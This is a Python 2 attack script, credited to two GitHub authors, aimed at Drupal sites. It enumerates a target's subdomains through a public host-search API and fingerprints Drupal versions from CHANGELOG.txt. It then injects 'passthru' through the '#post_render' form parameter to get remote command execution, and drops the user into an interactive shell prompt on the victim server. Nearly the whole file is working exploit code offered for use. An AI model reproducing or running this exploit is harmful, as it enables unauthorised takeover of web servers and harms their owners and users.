#!/usr/bin/env python
import requests,time,sys,re
# Authors:
# - batinihani ~ https://github.com/batininhani/
# - alpereneymen ~ https://github.com/alpereneymen/
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def exploit(HOST,cmq):
global r
get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru', 'name[#markup]': "'"+cmq+"'",'name[#type]': 'markup'}
post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
r = requests.post(HOST, data=post_params, params=get_params)
m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
if m:
found = m.group(1)
get_params = {'q': 'file/ajax/name/#value/' + found}
post_params = {'form_build_id': found}
r = requests.post(HOST, data=post_params, params=get_params)
def get_version(url):
try:
response = requests.get(url, timeout=2, headers={
'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'})
contents = response.text
if "Drupal" in contents:
splitted = contents.split()
print " {} [+] {} Version : {} {}\n".format(bcolors.OKGREEN,url,splitted[1].replace(",",""),bcolors.ENDC)
okno = raw_input("Do you want try exploit ? [Y/n] -> ")
if okno == "Y" or okno == "y":
while True:
http_https = raw_input(bcolors.OKGREEN + "HTTP / HTTPS ? -> " + bcolors.ENDC)
if http_https == "http" or http_https == "HTTP":
http_https = "http://"
break
elif http_https == "https" or http_https == "HTTPS":
http_https = "https://"
break
else:
continue
www_ask = raw_input(bcolors.OKGREEN+"If it's not subdomain put 'www' -> "+bcolors.ENDC)
if www_ask == "www":
www_ask = "www"
else:
www_ask = ""
HOST = http_https + www_ask + host + "/"
echo = "'echo w00t!'"
exploit(HOST, echo)
if r.text.splitlines()[0] == "w00t!":
print("\n"+bcolors.OKGREEN+"YOU GOT A SHELL!! "+bcolors.ENDC+"\n")
time.sleep(2.0)
while True:
cmq = raw_input('\033[1;31mshell > \033[1;m')
if cmq == "quit" or cmq == "q":
break
else:
cmq = "'%s'" %cmq
exploit(HOST, cmq)
print r.text[(r.text.index("")+len("")):r.text.index("[{")]
else:
print "[i]Not Exploitable!\n"
pass
except requests.exceptions.InvalidURL:
print "\n[i] Done!"
except (requests.ConnectionError,requests.ReadTimeout,requests.TooManyRedirects):
time.sleep(0.1)
target = raw_input(bcolors.OKGREEN + "Target :" + bcolors.ENDC)
yn = raw_input(bcolors.WARNING + "Do you want use proxy ?" + bcolors.BOLD + "[Y/N] :" + bcolors.ENDC)
if yn == "Y" or yn =="y":
p_ip = raw_input(bcolors.OKGREEN + "IP :" + bcolors.ENDC)
p_port = raw_input(bcolors.OKGREEN + "PORT :" + bcolors.ENDC)
p_full = p_ip + ":" + p_port
else:
p_full = "" # Change Proxy
http_proxy = p_full
proxyDict = {"http": http_proxy}
hostsearch = "http://api.hackertarget.com/hostsearch/?q=" + target
response = requests.get(hostsearch, headers={
'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'},
proxies=proxyDict)
hosts_ips = response.text
if "error check your search parameter" in hosts_ips:
sys.exit("Change Proxy!")
else:
content = hosts_ips.split("\n")
result = []
for line in content:
result.append(line.split(',')[0])
for host in result:
print ("[i]" + host + "-> CHECKING..")
get_version("http://" + host + "/CHANGELOG.txt")